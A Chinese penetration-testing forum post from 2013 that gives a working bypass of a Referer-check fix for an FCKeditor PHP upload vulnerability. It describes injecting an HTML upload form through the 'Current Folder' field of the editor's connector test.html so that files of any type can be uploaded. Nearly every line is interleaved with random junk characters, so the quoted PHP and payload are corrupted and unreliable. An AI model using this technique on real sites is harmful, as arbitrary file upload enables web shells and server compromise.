中国网络渗透测试联盟

标题: fckeditor 漏洞修复后的二次利用 [打印本页]

作者: admin    时间: 2013-1-11 21:12
标题: fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php( b0 T3 Q, L; G3 Y; I* H
网上给出的修复方案是2 z' U9 x9 l8 }% J+ V+ N, ]
修复方法,删除FCK编辑器用其他的编辑器! q6 e+ r/ j4 g2 v2 ^( W  ]
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
# C' Q# B* e: U( w# j7 O, `9 n) h
+ u* a- i) F& }- Zrequire(‘config.php’);" `$ ]! s& o. y, v
require(‘util.php’);
% t/ @7 `: L- x的下面添加以下代码—————————–
0 D) p, r- x# R. e$ ?$ r$ j- F) ]//防止外部提交$ F5 E5 f% H8 F8 l% j
function outsidepost()
1 r/ h* x. c) B* O6 Z{7 Z/ R3 A4 H& T! j' T
$servername=$_SERVER['SERVER_NAME'];6 ~. H# [6 S* |8 p& z
$sub_from=@$_SERVER['HTTP_REFERER'];2 H5 l& ^5 _! I# h5 l: d$ P
$sub_len=strlen($servername);
  t! c/ }4 [- d$ Q) X1 P) E, s: [& E' L$checkfrom=substr($sub_from,7,$sub_len);
: I$ @' m6 T6 G+ {9 \if($checkfrom!=$servername){% x+ L& ?/ ?/ g; i1 a4 T
echo(“you don’t outsidepost!”);
. L% H$ \0 W9 {; kexit;' _2 K  _; Q, e$ {
}! U/ f8 T& c7 [( T9 {9 c  K
}$ E# P/ H8 S$ _' G( o) \2 T
outsidepost();
$ N1 H/ T9 `8 \' u5 b) S防止外部提交,但是没有防止内部提交,
! T' D! V/ ]4 f# z0 R. W利用方法:
2 S9 n2 y& \& R8 T. K" ~: \6 u1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html. c2 h2 r( }! m8 I
2,在Current Folder 框输入
0 K, p& }4 B; l' n) b! ^8 a<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
1 \8 B. p: f! b3 c然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。+ F, g2 m- `* H' P" o
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2